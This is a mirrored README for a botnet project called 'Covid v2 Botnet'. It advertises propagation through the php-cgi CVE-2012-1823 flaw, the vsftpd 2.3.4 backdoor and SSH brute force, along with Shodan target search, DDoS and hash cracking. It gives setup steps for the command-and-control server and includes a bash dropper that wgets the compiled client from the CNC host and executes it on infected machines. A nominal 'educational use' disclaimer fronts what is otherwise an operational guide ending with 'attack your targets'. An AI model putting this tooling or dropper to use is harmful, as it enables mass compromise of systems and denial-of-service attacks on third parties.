Coder Social home page Coder Social logo

covid-v2-botnet's Introduction

Covid v2 Botnet

Disclaimers: this botnet is for educational purpose and ethical use only! any other use is on the user's own responsibility, and we are not responsible for any of the user's usage of it!

What can it do?

  • attack targets by a list
  • attack targets on local network with a scanner
  • spread through CVE-2012-1823 (php-cgi Argument Injection)
  • spread through CVE-2011-2523 (vsftpd 2.3.4 backdoor)
  • spread through SSH Brute Force
  • search targets on shodan
  • ddos spesific target (basic one with stop option)
  • recognize a given hash and crack it using a word list
  • save bots and targets lists into json file

Botnet Help Command

How to use?

  1. download the project

  2. configure the cnc ip and cnc port on client.py and server.py

  3. add shodan api token

  4. configure the wordlist in client.py and configure the wordlist length in server.py

  5. create an installation file to make the target get infected and configure it on server.py and client.py for example:

use a python compiler to compile client.py, then create a bash script that downloads the chosen wordlist, the compiled client and runs the client:

#!/bin/bash
cnc_ip="your cnc"
executable="created executable with python compiler"
wordlist="your configured wordlist location"
wget http://$cnc_ip/$executable
wget http://$cnc_ip/$wordlist
chmod 777 $executable
./$executable

configure the bash file name under executable in server.py and client.py

  1. run the server.py and attack your targets!

Attack example:

the attack is used on 3 local ips:

  • 192.168.10.16 - Vunerable to CVE-2012-1823

  • 192.168.10.18 - Vunerable to SSH Brute Force

  • 192.168.10.20 - Vunerable to CVE-2011-2523

Botnet Attack Example

Hash cracking example

the cracking is used on 3 infected bots and tries to crack md5 hash of "admin"

Botnet Crack Hash Example

covid-v2-botnet's People

Contributors

ahmadabudiab avatar dvir001 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.